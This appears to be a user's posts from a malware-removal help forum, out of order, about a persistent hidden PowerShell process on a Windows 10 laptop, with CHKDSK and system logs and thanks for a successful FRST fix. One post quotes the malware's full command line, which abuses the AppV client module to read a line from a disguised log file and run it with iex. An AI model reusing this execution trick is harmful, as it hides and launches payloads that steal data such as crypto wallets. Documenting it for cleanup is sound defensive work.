EffWerd

Thanks Maurice for your help, legend - got the scorpion off my back.

Hi Maurice, ESET log attached. No result. Let me know if you think there is possibly more to do, much appreciated. I'll keep an eye on things to see if this rogue process comes back in any case. Thanks! eset log.txt

Hi Maurice, Thanks a lot for you help with this. I ran the MS Safety Scanner which went fine for 3.5 hours then just stalled out on a particular file... sat there for another hour to see if it would pick up again but no luck. It did create the msert.log but nothing in it of value it seems (attached). So I went ahead and ran the FRST fix - log is attached. The powershell.exe process didn't return after reboot, so that's good. Interesting how hidden the whole thing is - I think for sure it was definitely something malicious, I did see it trying to scan for what I assume are crypto wallet folders at one stage in Procmon (I forgot to take a screenshot though...) Let me know if you think I should try and re-run the MS Safety Scanner tool again - it did count 24 'infected' files before stalling out. Cheers! Let me know if you have a ko-fi account or something, I'll buy you a coffee or two for your help :) Fixlog.txt msert.log

Hi, I've got an instance of powershell.exe which keeps coming back and seems to be up to no good. It's using a bit of system resources and has a bit of a suspect command line attached to it. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a = Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;iex $a;hackbacktrack ko8E7GIIPGwUKDdghNlVPuHA6yXABLHxKS1UBSVQI34=} Also seems to be pinging a server and also scanning through the file system if I watch it with Procmon. Can kill the process and it doesn't start back up till windows is restarted. Can't see anything obvious in Autoruns. Have run windows defender and malwarebytes scans but no result. Have attached FRST results. Thanks in advance if you can help. Addition.txt FRST.txt

New logs attached. Thanks for helping out, much appreciated. Addition.txt FRST.txt

The situation is the same unfortunately. I was reading another post where you helped someone with the same issue. You got them to run a fixlist through FRST outside of windows which seemed to resolve it for them. Composing said fixlist and what exactly you had it do is beyond me. Can we deconstruct MBAM outside of windows with FRST from the command prompt?

Logs as requested: Log Name: Application Source: Microsoft-Windows-Wininit Date: 21/11/2016 3:18:22 AM Event ID: 1001 Task Category: None Level: Information Keywords: Classic User: N/A Computer: Kevslaptop Description: Checking file system on C: The type of the file system is NTFS. Volume label is Windows. A disk check has been scheduled. Windows will now check the disk. Stage 1: Examining basic file system structure ... 492032 file records processed. File verification completed. 16758 large file records processed. 0 bad file records processed. Stage 2: Examining file name linkage ... 592928 index entries processed. Index verification completed. 0 unindexed files scanned. 0 unindexed files recovered to lost and found. Stage 3: Examining security descriptors ... Cleaning up 13 unused index entries from index $SII of file 0x9. Cleaning up 13 unused index entries from index $SDH of file 0x9. Cleaning up 13 unused security descriptors. Security descriptor verification completed. 50449 data files processed. CHKDSK is verifying Usn Journal... 40892616 USN bytes processed. Usn Journal verification completed. Stage 4: Looking for bad clusters in user file data ... 492016 files processed. File data verification completed. Stage 5: Looking for bad, free clusters ... 94295914 free clusters processed. Free space verification is complete. CHKDSK discovered free space marked as allocated in the master file table (MFT) bitmap. Windows has made corrections to the file system. No further action is required. 953325770 KB total disk space. 575342392 KB in 245807 files. 163780 KB in 50450 indexes. 0 KB in bad sectors. 635938 KB in use by the system. 65536 KB occupied by the log file. 377183660 KB available on disk. 4096 bytes in each allocation unit. 238331442 total allocation units on disk. 94295915 allocation units available on disk. Internal Info: 00 82 07 00 b4 84 04 00 7d 2b 08 00 00 00 00 00 ........}+...... 31 02 01 00 fb 7b 00 00 00 00 00 00 00 00 00 00 1....{.......... Windows has finished checking your disk. Please wait while your computer restarts. Event Xml: <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> <System> <Provider Name="Microsoft-Windows-Wininit" Guid="{206f6dea-d3c5-4d10-bc72-989f03c8b84b}" EventSourceName="Wininit" /> <EventID Qualifiers="16384">1001</EventID> <Version>0</Version> <Level>4</Level> <Task>0</Task> <Opcode>0</Opcode> <Keywords>0x80000000000000</Keywords> <TimeCreated SystemTime="2016-11-20T14:18:22.895205100Z" /> <EventRecordID>5745</EventRecordID> <Correlation /> <Execution ProcessID="0" ThreadID="0" /> <Channel>Application</Channel> <Computer>Kevslaptop</Computer> <Security /> </System> <EventData> <Data> Checking file system on C: The type of the file system is NTFS. Volume label is Windows. A disk check has been scheduled. Windows will now check the disk. Stage 1: Examining basic file system structure ... 492032 file records processed. File verification completed. 16758 large file records processed. 0 bad file records processed. Stage 2: Examining file name linkage ... 592928 index entries processed. Index verification completed. 0 unindexed files scanned. 0 unindexed files recovered to lost and found. Stage 3: Examining security descriptors ... Cleaning up 13 unused index entries from index $SII of file 0x9. Cleaning up 13 unused index entries from index $SDH of file 0x9. Cleaning up 13 unused security descriptors. Security descriptor verification completed. 50449 data files processed. CHKDSK is verifying Usn Journal... 40892616 USN bytes processed. Usn Journal verification completed. Stage 4: Looking for bad clusters in user file data ... 492016 files processed. File data verification completed. Stage 5: Looking for bad, free clusters ... 94295914 free clusters processed. Free space verification is complete. CHKDSK discovered free space marked as allocated in the master file table (MFT) bitmap. Windows has made corrections to the file system. No further action is required. 953325770 KB total disk space. 575342392 KB in 245807 files. 163780 KB in 50450 indexes. 0 KB in bad sectors. 635938 KB in use by the system. 65536 KB occupied by the log file. 377183660 KB available on disk. 4096 bytes in each allocation unit. 238331442 total allocation units on disk. 94295915 allocation units available on disk. Internal Info: 00 82 07 00 b4 84 04 00 7d 2b 08 00 00 00 00 00 ........}+...... 31 02 01 00 fb 7b 00 00 00 00 00 00 00 00 00 00 1....{.......... Windows has finished checking your disk. Please wait while your computer restarts. </Data> </EventData> </Event> sfcdetails.txt

Hey thanks for replying. Chkdsk is running at the moment.. Hopefully will have the log by the morning (2330 here). I ran SFC before and it didn't spit anything back at me but I'll post the log for that tomorrow as well. Cheers

Hi, I'm having issues getting MBAM or MBAM Clean to run. I keep getting this error "the application was unable to start correctly 0xc0000279". It seems to be only affecting the operation of MBAM however no other malware detection programs seem to be able to pick up on anything. I usually only run MBAM and Windows Defender, but I downloaded AVG and tried scanning with that and also the ESET online scanner which turned up nothing. I've tried running Rkill, TDSSKiller. And also FRST in and outside of windows. Computer specs: OS Name Microsoft Windows 10 Home Version 10.0.14393 Build 14393 Other OS Description Not Available OS Manufacturer Microsoft Corporation System Name KEVSLAPTOP System Manufacturer Hewlett-Packard System Model HP ENVY 17 Notebook PC System Type x64-based PC System SKU F7P64PA#ABG Processor Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz, 2401 Mhz, 4 Core(s), 8 Logical Processor(s) BIOS Version/Date Insyde F.68, 22/07/2016 SMBIOS Version 2.7 Embedded Controller Version 147.82 BIOS Mode UEFI BaseBoard Manufacturer Hewlett-Packard BaseBoard Model Not Available BaseBoard Name Base Board Platform Role Mobile Secure Boot State On PCR7 Configuration Binding Not Possible Windows Directory C:\WINDOWS System Directory C:\WINDOWS\system32 Boot Device \Device\HarddiskVolume2 Locale New Zealand Hardware Abstraction Layer Version = "10.0.14393.206" User Name Kevslaptop\Kevin Time Zone New Zealand Daylight Time Installed Physical Memory (RAM) 8.00 GB Total Physical Memory 7.93 GB Available Physical Memory 5.50 GB Total Virtual Memory 9.18 GB Available Virtual Memory 6.63 GB Page File Space 1.25 GB Page File C:\pagefile.sys Hyper-V - VM Monitor Mode Extensions Yes Hyper-V - Second Level Address Translation Extensions Yes Hyper-V - Virtualization Enabled in Firmware No Hyper-V - Data Execution Protection Yes Log files are attached. Any help would be much appreciated. Cheers Addition.txt FRST.txt Rkill.txt Addition - recovery mode.txt FRST - recovery mode.txt